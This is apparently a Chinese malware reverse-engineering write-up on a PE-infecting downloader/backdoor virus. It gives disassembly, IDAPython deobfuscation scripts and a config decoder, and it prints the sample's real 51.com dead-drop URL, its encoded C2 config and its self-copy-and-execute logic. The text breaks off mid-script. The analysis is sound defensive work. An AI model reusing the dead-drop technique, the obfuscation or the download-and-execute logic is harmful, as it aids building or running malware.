这个是我搞病毒分析以来遇到的相对来说功能比较齐全的病毒,有感染pe文件,有下载执行,有后门功能等。
这个病毒是会感染pe文件的,调试的时候要小心。不联网的话应该不会感染,因为感染例程(Infect_with_flag__)只在下载回来的配置里 40000000h 标志置位时才会被调用(见下文 004050CD 处的分发代码),也就是说感染是受网络控制的;但复制自身到 %tmp%\ppsap.exe 并 WinExec 的逻辑不需要联网就会执行,所以仍然应该在隔离的虚拟机里、打好快照之后再调试。
入口:
00406F88 >/$ 55 push ebp
00406F89 |. 8BEC mov ebp, esp
00406F8B |. 53 push ebx
00406F8C |. 51 push ecx
00406F8D |. E8 04000000 call 00406F96
00406F92 |. 92 xchg eax, edx
00406F93 |. 5F pop edi
00406F94 |. 0000 add byte ptr [eax], al
00406F96 |$ 5B pop ebx
00406F97 |. 2B1B sub ebx, dword ptr [ebx] ;这里ebx = 401000
00406F99 |. 8B03 mov eax, dword ptr [ebx]
00406F9B |. B9 06610000 mov ecx, 6106
00406FA0 |> 83F9 04 /cmp ecx, 4
00406FA3 |. 72 1A |jb short 00406FBF
00406FA5 |. 81F9 82010000 |cmp ecx, 182
00406FAB |. 73 08 |jnb short 00406FB5
00406FAD |. 81F9 3C010000 |cmp ecx, 13C
00406FB3 |. 77 02 |ja short 00406FB7
00406FB5 |> 3103 |xor dword ptr [ebx], eax
00406FB7 |> 83C3 04 |add ebx, 4
00406FBA |. 83E9 04 |sub ecx, 4
00406FBD |.^ EB E1 \jmp short 00406FA0
00406FBF |> E8 33010000 call 004070F7
发现代码是加密的,解密过程很简单:密钥就是 401000 处的第一个 dword(mov eax, [ebx]),从 401000 起逐个 dword 与它异或,计数从 0x6106 开始每次减 4、小于 4 时结束,计数落在 0x13C 与 0x182 之间(不含)的那几个 dword 被跳过不解密。写个idapython来解密下:
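def decrypt_offsets(length=0x6106, skip_range=(0x13c, 0x182)):
    """Yield (byte_offset, apply_xor) for every dword the loader loop at 00406FA0 visits.

    The loop counts ``length`` down by 4 and stops as soon as the counter drops
    below 4.  A dword is XOR-ed unless the counter lies strictly inside
    ``skip_range`` (``cmp ecx,182h / jnb`` and ``cmp ecx,13Ch / ja`` in the
    original).  Offsets are relative to the first dword, which is the key.
    """
    low, high = skip_range
    offset = 0
    remaining = length
    while remaining >= 4:
        yield offset, not (low < remaining < high)
        offset += 4
        remaining -= 4


def decrypt_main_exe(startva=0x401000, length=0x6106, skip_range=(0x13c, 0x182)):
    """Undo the XOR layer over the encrypted region in place (IDAPython).

    startva     first dword of the encrypted region; it holds the key
                (``mov eax, [ebx]`` with ebx = 401000h).
    length      byte count the loop starts from (``mov ecx, 6106h``).
    skip_range  counter window whose dwords the loop leaves untouched.

    With the default parameters the key dword is XOR-ed with itself on the
    first iteration, so an already decrypted image has 0 at startva; that is
    what the early return tests, which makes the script safe to run twice.
    """
    key = Dword(startva)
    if key == 0:
        return
    for offset, apply_xor in decrypt_offsets(length, skip_range):
        if not apply_xor:
            continue
        ea = startva + offset
        PatchDword(ea, Dword(ea) ^ key)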
走进 004070f7
.text:004070F7 key_call proc near ; CODE XREF: .text:loc_406FBFp
.text:004070F7 call GetFuncsAddress
.text:004070FC test eax, eax
.text:004070FE jz short locret_407105
.text:00407100
.text:00407100 loc_407100:
.text:00407100 call sub_406FCA
.text:00407105
.text:00407105 locret_407105: ; CODE XREF: key_call+7j
.text:00407105 retn
004070f7的call 在ida中直接去大致浏览一下,发现只是获取一些api地址
但是其中用到了一些小技巧来影响我们的反汇编分析
1、获取api地址的时候,先 dec eax 看 api 入口的前一个字节是否是 90(nop),如果是就把保存的 api 地址减一,指向这个 nop:执行时多跑一条 nop 就进入真正的函数,结果不变,但 OD 按这个地址找不到导出名,就无法正确显示 api 调用。直接 ctrl + b 搜索二进制 80 38 90 74 01(即 cmp byte ptr [eax], 90 / je +1)把它 nop 掉即可。
00401325 48 dec eax
00401326 8038 90 cmp byte ptr [eax], 90
00401329 74 01 je short 0040132C
0040132B 40 inc eax
获取的api地址为:
00401014 7C80AC28 kernel32.GetProcAddress
00401018 7C801D77 kernel32.LoadLibraryA
0040101C 7C80EB3F kernel32.CreateMutexA
00401020 7C910331 ntdll.RtlGetLastWin32Error
00401024 7C809B77 kernel32.CloseHandle
00401028 7C86114D kernel32.WinExec
0040102C 7C812851 kernel32.GetVersionExA
00401030 7C90311B ntdll.RtlZeroMemory
00401034 7C80C729 kernel32.lstrcpyA
00401038 7C838FB9 kernel32.lstrcatA
0040103C 7C80C6E0 kernel32.lstrlenA
00401040 7C8397A1 kernel32.GetCurrentDirectoryA
00401044 7C80B357 kernel32.GetModuleFileNameA
00401048 7C81082F kernel32.CreateThread
0040104C 7C830053 kernel32.CopyFileA
00401050 7C8221CF kernel32.GetTempPathA
00401054 7C8681F6 kernel32.GetLongPathNameA
00401058 7C81174C kernel32.GetFileAttributesA
写个idapython脚本来对地址进行标记一下:
#encoding=utf-8
#指定iat文件路径,内容是从od里拷出来的
iatfile=r"C:\IDA\idc\py\iat.txt"
def main():
diclist = dict()
hfile = file(iatfile,'r')
for line in hfile.readlines( 
if len(line)>0x10:
address = long(line[0:8],16)
funcname = line.split('.')
if len(funcname) == 2:
name = funcname[1]
#去掉名字后面的换行或者空格
got_name = name[:-1]
diclist[got_name] = address
sorted_dic = map(lambda x:(x[0], x[1]), diclist.items())
for funcname,address in sorted_dic:
address=address & 0xFFFFFFFF
MakeDword(address)
MakeName(address,funcname)
print "address %08x,funcname %s" % (address,funcname)
if __name__ == "__main__":
print "label start"
main()
print "finished"
2、 一些指令变形
0040132C E8 04000000 call 00401335
00401331 1D 0300005B sbb eax, 5B000003
00401336 2B1B sub ebx, dword ptr [ebx]
上面的这几条是变形指令,直接go到00401335可以看到:
0040132C E8 04000000 call 00401335
00401335 5B pop ebx
00401336 2B1B sub ebx, dword ptr [ebx]
上面的三步指令相当于
.text:00401333 mov ebx, 0x401014
其中ebx可以是其他的寄存器,不过在分析过程中只遇到过eax,ebx,edi,esi
类似的变形指令还有
0040127A E8 04000000 call 00401283
00401283 58 pop eax ; Copy_of_.0040127F
00401284 2B00 sub eax, dword ptr [eax]
00401286 FF10 call dword ptr [eax]
实际为:
00401282 FF15 18104000 call dword ptr [401018] ; kernel32.LoadLibraryA
写个idaPython脚本来清理下变形代码:
#encoding=utf-8
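# Every obfuscated form starts with "E8 04 00 00 00" (call $+9): a call that
# jumps over the 4-byte dword stored right behind it.  The code it lands on does
#     pop REG            ; REG = address of that dword (the pushed return address)
#     sub REG, [REG]     ; REG = dword_address - dword_value  == the real value
# so the 12-byte sequence is just "mov REG, imm32"; when "call dword ptr [eax]"
# follows, the 14-byte sequence is "call dword ptr [imm32]".
#
# (pop opcode, word of "sub REG,[REG]", word that must NOT follow, mov-imm32 opcode)
_POP_SUB_FORMS = (
    (0x58, 0x002b, 0x10ff, 0xb8),  # eax; FF 10 = call dword ptr [eax], handled separately
    (0x5b, 0x1b2b, 0xd3ff, 0xbb),  # ebx; FF D3 = call ebx is left untouched
    (0x5f, 0x3f2b, 0xd7ff, 0xbf),  # edi; FF D7 = call edi is left untouched
    (0x5e, 0x362b, 0xd6ff, 0xbe),  # esi; FF D6 = call esi is left untouched
)

# HideArea arguments shared by every rewrite: description, header, footer, colour.
_HIDDEN = ("nop code", "----------", "----------", 0xa0a0a0)


def _pop_sub_target(ret_addr, stored_offset):
    """Value REG holds after "pop REG; sub REG,[REG]", with 32-bit wrap-around.

    ret_addr is the address of the dword the call skipped (the return address
    the pop picks up); stored_offset is the dword stored there.
    """
    return (ret_addr - stored_offset) & 0xffffffff


def _nop_fill(start, end):
    """Overwrite [start, end) with 0x90."""
    for ea in range(start, end):
        PatchByte(ea, 0x90)


def _mark_code(start, end):
    """Make every byte in [start, end) its own (1-byte NOP) instruction."""
    for ea in range(start, end):
        MakeCode(ea)


def _rewrite_call_via_eax(curva, target):
    """call $+9 / dd / pop eax / sub eax,[eax] / call [eax] -> 8 x NOP ; call dword ptr [target]."""
    MakeUnknown(curva - 5, 14, 0)
    _nop_fill(curva - 5, curva + 3)
    PatchWord(curva + 3, 0x15ff)          # FF 15 = call dword ptr [imm32]
    PatchDword(curva + 5, target)
    _mark_code(curva - 5, curva + 3)
    HideArea(curva - 5, curva + 3, *_HIDDEN)
    MakeCode(curva + 3)


def _rewrite_mov_imm(curva, mov_opcode, target):
    """call $+9 / dd / pop REG / sub REG,[REG] -> 7 x NOP ; mov REG, target."""
    MakeUnknown(curva - 5, 12, 0)
    _nop_fill(curva - 5, curva + 2)
    PatchByte(curva + 2, mov_opcode)      # B8+reg = mov REG, imm32
    PatchDword(curva + 3, target)
    _mark_code(curva - 5, curva + 2)
    MakeCode(curva + 2)
    HideArea(curva - 5, curva + 2, *_HIDDEN)


def main(startva=0x401000):
    """Scan the segment containing startva and rewrite every call/pop/sub idiom in place.

    The computed value is always masked to 32 bits before patching (the old
    code only did so for the eax/mov form), so a wrapped subtraction can never
    hand PatchDword a negative number.
    """
    seg_start = SegStart(startva)
    seg_end = SegEnd(startva)
    for ea in range(seg_start, seg_end):
        if Byte(ea) != 0xe8 or Dword(ea + 1) != 0x4:
            continue
        curva = ea + 5                         # the skipped dword == value the pop picks up
        target = _pop_sub_target(curva, Dword(curva))
        pop_op = Byte(curva + 4)
        if pop_op == 0x58 and Dword(curva + 5) == 0x10ff002b:
            print("curva is %08x -> call dword ptr [%08x]" % (curva, target))
            _rewrite_call_via_eax(curva, target)
            continue
        sub_word = Word(curva + 5)
        next_word = Word(curva + 7)
        for want_pop, want_sub, forbid_next, mov_op in _POP_SUB_FORMS:
            if pop_op == want_pop and sub_word == want_sub and next_word != forbid_next:
                print("curva is %08x -> mov reg, %08x" % (curva, target))
                _rewrite_mov_imm(curva, mov_op, target)
                break


if __name__ == "__main__":
    print("---------------------\nFix Start...")
    main()
    print("finished")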
现在代码都清理干净了,用ida静态分析即可,有必要可以用od动态调试下,
程序首先会对运行路径以及是否已经有病毒在运行进行一下判断,满足条件才运行病毒代码
.text:00406FCA sub_406FCA proc near ; CODE XREF: key_call:loc_407100p
.text:00406FCA
.text:00406FCA var_7FF7B = byte ptr -7FF7Bh
.text:00406FCA tmp_path = byte ptr -800h
.text:00406FCA filepath = byte ptr -400h
.text:00406FCA
.text:00406FCA push ebp
.text:00406FCB mov ebp, esp
.text:00406FCD add esp, -800h
.text:00406FD3 push 400h ; nSize
.text:00406FD8 lea eax, [ebp+filepath]
.text:00406FDE push eax ; lpFilename
.text:00406FDF push 0 ; hModule
.text:00406FE1 ; nop code
.text:00406FE9 ; ---------------------------------------------------------------------------
.text:00406FE9 call GetModuleFileNameA
.text:00406FEF push 400h ; cchBuffer
.text:00406FF4 lea eax, [ebp+filepath]
.text:00406FFA push eax ; lpszLongPath
.text:00406FFB push eax ; lpszShortPath
.text:00406FFC ; nop code
.text:00407004 call GetLongPathNameA
.text:0040700A lea eax, [ebp+tmp_path]
.text:00407010 push eax ; lpBuffer
.text:00407011 push 400h ; nBufferLength
.text:00407016 ; nop code
.text:0040701E ; ---------------------------------------------------------------------------
.text:0040701E call GetTempPathA
.text:00407024 push 400h ; cchBuffer
.text:00407029 lea eax, [ebp+tmp_path]
.text:0040702F push eax ; lpszLongPath
.text:00407030 push eax ; lpszShortPath
.text:00407031 ; nop code
.text:00407039 ; ---------------------------------------------------------------------------
.text:00407039 call GetLongPathNameA
.text:0040703F lea eax, [ebp+tmp_path]
.text:00407045 push eax ; lpString
.text:00407046 ; nop code
.text:0040704E ; ---------------------------------------------------------------------------
.text:0040704E call lstrlenA
.text:00407054 mov ecx, eax
.text:00407056 lea esi, [ebp+tmp_path]
.text:0040705C lea edi, [ebp+filepath]
.text:00407062
.text:00407062 @compare: ; CODE XREF: sub_406FCA+ACj
.text:00407062 test ecx, ecx
.text:00407064 jz short @equal
.text:00407066 mov al, [esi]
.text:00407068 mov ah, [edi]
.text:0040706A or eax, 2020h
.text:0040706F xor al, ah
.text:00407071 jnz short loc_40708A
.text:00407073 inc esi
.text:00407074 inc edi
.text:00407075 dec ecx
.text:00407076 jmp short @compare
.text:00407078 ; ---------------------------------------------------------------------------
上面的循环按 lstrlenA(tmp_path) 的长度逐字节比较自身路径和临时目录,or eax, 2020h 把两个字符都折成小写,相当于不区分大小写的前缀比较,实际是判断程序是否是从 %tmp% 目录启动的:如果是则来到这里,不是则跳到0040708a
.text:00407078
.text:00407078 @equal: ; CODE XREF: sub_406FCA+9Aj
.text:00407078 call @check_mutex 确保只有一个病毒进程在运行
.text:0040707D test eax, eax
.text:0040707F jnz short @ren
.text:00407081 push 0
.text:00407083 call sub_406D4D 运行payload
.text:00407088 jmp short @ren
.text:0040708A ; ---------------------------------------------------------------------------
.text:0040708A
.text:0040708A loc_40708A: ; CODE XREF: sub_406FCA+A7j
.text:0040708A call sub_406D5E 判断病毒启动的目录下是否存在AAA_AAA_AAA_01文件,如果存在则
运行 "explorer.exe C:\Documents and Settings\SRE\Desktop\AAA_AAA_AAA_01"
AAA_AAA_AAA_01是什么呢? 在网上搜了一下,跟极品飞车12的车的修改代码,有关猜测病毒是通过这个传播的
.text:0040708F call @check_mutex
.text:00407094 test eax, eax
.text:00407096 jnz short @ren
.text:00407098 call loc_4070A7
.text:00407098 ; ---------------------------------------------------------------------------
.text:0040709D aPpsap_exe db 'ppsap.exe',0
.text:004070A7 ; ---------------------------------------------------------------------------
.text:004070A7
.text:004070A7 loc_4070A7: ; CODE XREF: sub_406FCA+CEp
.text:004070A7 lea eax, [ebp+tmp_path]
.text:004070AD push eax ; lpString1
.text:004070AE ; nop code
.text:004070B6 ; ---------------------------------------------------------------------------
.text:004070B6 call lstrcatA
拷贝自身到%tmp%\ppsap.exe
.text:004070BC push 0 ; bFailIfExists
.text:004070BE lea eax, [ebp+tmp_path]
.text:004070C4 push eax ; lpNewFileName
.text:004070C5 lea eax, [ebp+filepath]
.text:004070CB push eax ; lpExistingFileName
.text:004070CC ; nop code
.text:004070D4 call CopyFileA
.text:004070DA test eax, eax
.text:004070DC jz short @ren
拷贝成功则运行%tmp%\ppsap.exe
.text:004070DE push 0 ; uCmdShow
.text:004070E0 lea eax, [ebp+tmp_path]
.text:004070E6 push eax ; lpCmdLine
.text:004070E7 ; nop code
.text:004070EF ; ---------------------------------------------------------------------------
.text:004070EF call WinExec
.text:004070F5
.text:004070F5 @ren: ; CODE XREF: sub_406FCA+B5j
.text:004070F5 ; sub_406FCA+BEj ...
.text:004070F5 leave
.text:004070F6 retn
通过上面的代码我们可以看到其主要恶意代码在00406d4d(只有从 %tmp% 启动、并且互斥体检查通过之后才会调用)
.text:00406D4D sub_406D4D proc near ; CODE XREF: sub_406FCA+B9p
.text:00406D4D ; DATA XREF: .text:00406EC6o
.text:00406D4D push ebp
.text:00406D4E mov ebp, esp
.text:00406D50
.text:00406D50 loc_406D50:
依然是获取病毒所需的api地址,处理方法同第一次,获取api列表我就不写了
.text:00406D50 call GetFunsAddress_0
.text:00406D55 call @net_activity_start 接下来进行一些网络活动
.text:00406D5A leave
.text:00406D5B retn 4
.text:00406D5B sub_406D4D endp
进入00406d55处的call
.text:00406CB5 @net_activity_start proc near ; CODE XREF: @net_activity_start+92j
.text:00406CB5 ; sub_406D4D+8p
.text:00406CB5 call net_activity
.text:00406CBA test eax, eax
.text:00406CBC jz short loc_406D34
.text:00406CBE push 0 ; protocol
.text:00406CC0 push 2 ; type
.text:00406CC2 push 2 ; af
.text:00406CC4 ; nop code
.text:00406CCC ; ---------------------------------------------------------------------------
.text:00406CCC call socket
.text:00406CD2 ; nop code
.text:00406CD9 mov ebx, offset unk_401860
.text:00406CDE mov [ebx], eax ; dword(00401860) = hsocket
.text:00406CE0 ; nop code
.text:00406CE7 mov eax, 401888h
.text:00406CEC push eax
.text:00406CED ; nop code
.text:00406CF4 mov eax, offset unk_401860
.text:00406CF9 push dword ptr [eax]
.text:00406CFB ; nop code
.text:00406D02 mov eax, offset sub_40512F
.text:00406D07 push eax ; 0040512F
.text:00406D08 call Call_CreateThread
.text:00406D0D call send_data_net_activity
.text:00406D12 ; nop code
.text:00406D19 mov eax, offset unk_401860
.text:00406D1E push dword ptr [eax] ; s
.text:00406D20 mov dword ptr [eax], 0FFFFFFFFh
.text:00406D26 ; nop code
.text:00406D2E ; ---------------------------------------------------------------------------
.text:00406D2E call closesocket
.text:00406D34
.text:00406D34 loc_406D34: ; CODE XREF: @net_activity_start+7j
.text:00406D34 push 1B7740h ; dwMilliseconds
.text:00406D39 ; nop code
.text:00406D41 ; ---------------------------------------------------------------------------
.text:00406D41 call Sleep
.text:00406D47 jmp @net_activity_start
.text:00406D4C ; ---------------------------------------------------------------------------
.text:00406D4C retn
一步步详解其网络行为:
程序首先从http://home.51.com/?u=testdown&c=diary&a=getdataview&id=10049014下载配置文件(配置藏在一篇 51.com 日记的 memo 字段里,以 ######## 起头、每个字节用 A~P 两个字符编码,相当于把合法站点当作存放 C2 配置的 dead drop),然后进行分析处理获得下载连接,下载执行
.text:00406775 push ecx
.text:00406776 mov [ebp+need_download_config_data_next_or_not], 0
.text:0040677D push 100000h ; dwBytes
.text:00406782 push 40h ; uFlags
.text:00406784 ; nop code
.text:0040678C call GlobalAlloc
.text:00406792 test eax, eax
.text:00406794 jz @retn
.text:0040679A mov [ebp+config_data_for_backdoor], eax
.text:0040679D
.text:0040679D loc_40679D:
.text:0040679D push 100000h
.text:004067A2 push [ebp+config_data_for_backdoor]
.text:004067A5 call loc_4067EB
.text:004067A5 ; ---------------------------------------------------------------------------
.text:004067AA aHttpHome_51_com?uTe db 'http://home.51.com/?u=testdown&c=diary&a=getdataview&id=10049014',0
.text:004067EB ; ---------------------------------------------------------------------------
.text:004067EB
.text:004067EB loc_4067EB: ; CODE XREF: net1+39p
.text:004067EB call Read_configdata_from_net
.text:004067F0 test eax, eax
.text:004067F2 jz short @read_fail
.text:004067F4 push eax ; decrypt data size
.text:004067F5
.text:004067F5 loc_4067F5: ; decrypt data
.text:004067F5 push [ebp+config_data_for_backdoor]
.text:004067F8 call Anslysis_config_data_and_download_execute
下载下来的data:
{
window.modData = {"view":{"id":"10049014","gid":"134960","is_top":"0","heart":"","title":"2010-11-20\u7684\u65e5\u8bb0","memo":"<br \/>\r\n########FPAAAAAACGBKEBBAEJHNEEEOEGFFHAGEGBHEGFDADDDADICOGFHIGFAAGIHEHEHADKCPCPHHHHHHCODBGEGJHDGLCOGDGOCPEDGPGOHEGFGOHEFAGBGOGFCOGBHDHAHIDPGEGPHHGODNGPGLCGGGGJGMGFHAGBHEGIDNHEGFHDHEDHDHDFDICFDCGGEEEOEGCOGEGBHEAA<br \/>\r\n<br \/>\r\n########AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br \/>\r\nqq2install<br \/>\r\n########FLAAAAAADGHOEBJKDELLGCGJHCHEGIGHGJGGHECOGFHIGFAAGIHEHEHADKCPCPHHHHHHCODBGEGJHDGLCOGDGOCPEDGPGOHEGFGOHEFAGBGOGFCOGBHDHAHIDPGEGPHHGODNGPGLCGGGGJGMGFHAGBHEGIDNHEGFHDHEDHDHDFDICFDCGGHBHBDCCOGEGPGDAA <br \/>\r\n<br \/>\r\n ","weekday":"1","show_time":"2010-11-20 17:37:00","flower":"0","egg":"0","ping":"0","click":"4236526","sources":"0","share_flag":"1","share_users":"","hide_comment":"0","share_num":"0","url":"\/testdown\/diary\/item\/10049014.html","_can_view":"1","_desc":"","_putpass":"0","add_time":"1290245878"},"prev":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0a\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u7b2c\u4e00\u7bc7","show_time":"","url":"\/testdown\/diary\/item\/.html"},"next":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0b\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u6700\u540e\u4e00\u7bc7","show_time":"","url":"\/testdown\/diary\/item\/.html"},"catalog":[{"id":"134960","name":"\u6211\u7684\u65e5\u8bb0","hide":"0","url":"\/testdown\/diary\/group\/134960","count":"1"},{"id":"134961","name":"\u6211\u7684\u6587\u7ae0","hide":"0","url":"\/testdown\/diary\/group\/134961","count":"0"},{"id":"134962","name":"\u7f51\u7edc\u6587\u6458","hide":"0","url":"\/testdown\/diary\/group\/134962","count":"0"}],"comment":{"list":{"total":"0","pages":"0","page":"0","rows":[],"userinfo":[]}},"sharelist":[],"lastvisitor":{"rows":[{"nickname":"54243","face":"http:\/\/static.51img1.com\/sysface\/woman_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"237
955579","_user":"5759497","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u4f0d\u5148\u751f","face":"http:\/\/p3.u.51img1.com\/39\/31\/267956964_50.gif?v=20120330123104","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"<a href='http:\/\/51vip.51.com\/level\/vipgrade.php' target='_blank'><img src='http:\/\/static.51img1.com\/i\/kf\/viplevel\/vip1.gif?0401' align='absmiddle' border=0 title='\u6210\u957f\u503c 112' style='filter:none;' \/><\/a> ","isconfirm":"1","isopen":"0","user":"267956964","_user":"91628762","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\uff3c\u3002\u88ab\u8fe9\u5ffd\u7565\u3001","face":"http:\/\/p5.u.51img1.com\/55\/d4\/xingfu2025_50.gif?v=20091226161855","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"2","user":"xingfu2025","_user":"xingfu2025","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u65e0\u804a","face":"http:\/\/static.51img1.com\/sysface\/man_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"vbvbvbzq","_user":"vbvbvbzq","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"_ \u7eaf 
\u3001","face":"http:\/\/pe.u.51img1.com\/eb\/fd\/lovening1025_50.gif?v=20101209174127","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"lovening1025","_user":"lovening1025","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"nacy","face":"http:\/\/pa.u.51img1.com\/a9\/f3\/a20088823_50.gif?v=20090313220255","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"a20088823","_user":"a20088823","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u6e05\u98ce\u4f9d\u65e7","face":"http:\/\/p4.u.51img1.com\/40\/47\/dis13141998_50.gif?v=20110614170758","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"0","isopen":"0","user":"dis13141998","_user":"dis13141998","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""}],"total":"14"},"morediary":[],"current":{"gid":"134960","ghide":"0","gname":"\u6211\u7684\u65e5\u8bb0","gcount":"1","url":"\/testdown\/diary\/group\/134960"}};
}
解密过程:
.text:00401A33 Decrypt_read_data proc near ; CODE XREF: Read_configdata_from_net+19p
.text:00401A33 ; sub_405F62+E7p
.text:00401A33
.text:00401A33 first_dword_after_decrypt= dword ptr -4
.text:00401A33 arg_0_read_data = dword ptr 8
.text:00401A33 arg_4_read_size = dword ptr 0Ch
.text:00401A33
.text:00401A33 push ebp
.text:00401A34 mov ebp, esp
.text:00401A36 add esp, 0FFFFFFFCh
.text:00401A39 push ebx
.text:00401A3A push ecx
.text:00401A3B push edx
.text:00401A3C push edi
.text:00401A3D mov ebx, [ebp+arg_0_read_data]
.text:00401A40 mov ecx, [ebp+arg_4_read_size]
.text:00401A43 sub ecx, 0Ah ; ecx = read_size - 0xa
.text:00401A46
.text:00401A46 @find_loop: ; CODE XREF: Decrypt_read_data+2Aj
.text:00401A46 test ecx, ecx
.text:00401A48 jz short @return_zero
.text:00401A4A cmp dword ptr [ebx], '####'
.text:00401A50 jnz short @next_byte
.text:00401A52 cmp dword ptr [ebx+4], '####'
.text:00401A59 jz short @found_flag ; pass the ######## ebx = found data
.text:00401A5B
.text:00401A5B @next_byte: ; CODE XREF: Decrypt_read_data+1Dj
.text:00401A5B inc ebx
.text:00401A5C dec ecx
.text:00401A5D jmp short @find_loop
.text:00401A5F ; ---------------------------------------------------------------------------
.text:00401A5F
.text:00401A5F @found_flag: ; CODE XREF: Decrypt_read_data+26j
.text:00401A5F add ebx, 8 ; pass the ######## ebx = found data
.text:00401A62 sub ecx, 8 ; ecx = read_size - 8 - found_data_offset -a
.text:00401A62 ; 11d5 for 014
.text:00401A65 mov edi, [ebp+arg_0_read_data]
.text:00401A68 shr ecx, 1 ; 11d5 / 2 = 8ea
.text:00401A6A xor eax, eax
.text:00401A6C
.text:00401A6C @decrypt_loop: ; CODE XREF: Decrypt_read_data+55j
.text:00401A6C test ecx, ecx
.text:00401A6E jz short @decrypt_finished
.text:00401A70 mov ah, [ebx] ; ah = found_data[0]
.text:00401A72 mov al, [ebx+1] ; al = found_data[1]
.text:00401A75 sub eax, 4141h ; eax = eax - 0x4141
.text:00401A7A mov edx, eax ; edx eax - 0x4141
.text:00401A7C shr eax, 4 ; eax = eax >> 4
.text:00401A7F or eax, edx ; eax = (eax - 0x4141 ) | ((eax - 0x4141 )>>4)
.text:00401A81 mov [edi], al ; byte(read_data) = (eax - 0x4141 ) | ((eax - 0x4141 )>>4)
.text:00401A83 add ebx, 2 ; found_data = found_data +2
.text:00401A86 inc edi ; read_data = read_data + 1
.text:00401A87 dec ecx ; ecx --
.text:00401A88 jmp short @decrypt_loop
.text:00401A8A ; ---------------------------------------------------------------------------
.text:00401A8A
.text:00401A8A @decrypt_finished: ; CODE XREF: Decrypt_read_data+3Bj
.text:00401A8A mov ebx, [ebp+arg_0_read_data]
.text:00401A8D mov ecx, [ebx] ; ecx = first_dword_after_decrypt
.text:00401A8F cmp ecx, [ebp+arg_4_read_size]
.text:00401A92 ja short @return_zero
.text:00401A94 mov [ebp+first_dword_after_decrypt], ecx
.text:00401A97 add ebx, 4 ; ebx = read_data + 4
.text:00401A9A movzx edx, word ptr [ebx] ; edx = word(read_data+4)
.text:00401A9D add ebx, 2 ; ebx = read_data + 6
.text:00401AA0 xor eax, eax
.text:00401AA2 mov esi, ebx ; esi ebx = read_data + 6
.text:00401AA4
.text:00401AA4 @add_together: ; CODE XREF: Decrypt_read_data+7Ej
.text:00401AA4 cmp ecx, 4
.text:00401AA7 jb short @add_over
.text:00401AA9 add eax, [esi]
.text:00401AAB add esi, 4
.text:00401AAE sub ecx, 4
.text:00401AB1 jmp short @add_together
.text:00401AB3 ; ---------------------------------------------------------------------------
.text:00401AB3
.text:00401AB3 @add_over: ; CODE XREF: Decrypt_read_data+74j
.text:00401AB3 and eax, 0FFFFh
.text:00401AB8 cmp eax, edx
.text:00401ABA jz short @data_is_right
.text:00401ABC
.text:00401ABC @return_zero: ; CODE XREF: Decrypt_read_data+15j
.text:00401ABC ; Decrypt_read_data+5Fj
.text:00401ABC mov [ebp+first_dword_after_decrypt], 0
.text:00401AC3 jmp short @retn
.text:00401AC5 ; ---------------------------------------------------------------------------
.text:00401AC5
.text:00401AC5 @data_is_right: ; CODE XREF: Decrypt_read_data+87j
.text:00401AC5 mov ecx, [ebp+first_dword_after_decrypt]
.text:00401AC8 mov edi, [ebp+arg_0_read_data]
.text:00401ACB mov esi, edi
.text:00401ACD add esi, 6
.text:00401AD0 rep movsb
.text:00401AD2
.text:00401AD2 @retn: ; CODE XREF: Decrypt_read_data+90j
.text:00401AD2 mov eax, [ebp+first_dword_after_decrypt]
.text:00401AD5 pop edi
.text:00401AD6 pop edx
.text:00401AD7 pop ecx
.text:00401AD8 pop ebx
.text:00401AD9 leave
.text:00401ADA retn 8
.text:00401ADA Decrypt_read_data endp
写个脚本来模拟其解密过程,顺便监控其下载的配置文件,
写个脚本也不用每次都调试,直接运行脚本就可以获取其解密后配置文件:
import re, struct, os, sys
def Decrypt_Config(srcData, hOutFile):
currIndex = 0
data_len = len(srcData)
ecx = data_len - 0xa
p = re.compile(r'########(.*)',re.DOTALL)
m = p.search(srcData)
decrypt_data = []
if m:
found_offset = m.start(1)
ecx = ecx - found_offset
ecx = ecx >> 1
#print "ecx %08x" % ecx
while ecx != 0:
ah = srcData[found_offset]
al = srcData[found_offset+1]
eax = (ord(ah) << 0x8) | ord(al)
#print "eax %08x" % eax
eax = eax - 0x4141
edx = eax
eax = eax >> 4
eax = edx | eax
#print "after or eax %08x" % eax
decrypt_data.append(chr(eax & 0xff))
found_offset = found_offset+2
ecx = ecx - 1
decrypt_data_ = "".join(decrypt_data)
first_dword = struct.unpack('I',decrypt_data_[0:4])[0]
if first_dword <= data_len:
check_value = struct.unpack('H',decrypt_data_[4:6])[0]
print "check_value %08x" % check_value
ecx = first_dword
eax = 0
esi = decrypt_data_[6:]
cur_offset = 0
while ecx >= 4:
eax = eax + struct.unpack('I',esi[cur_offset:cur_offset + 4])[0]
cur_offset = cur_offset + 4
ecx = ecx -4
eax = eax & 0xffff
if eax == check_value:
real_data = decrypt_data_[6:first_dword+6]
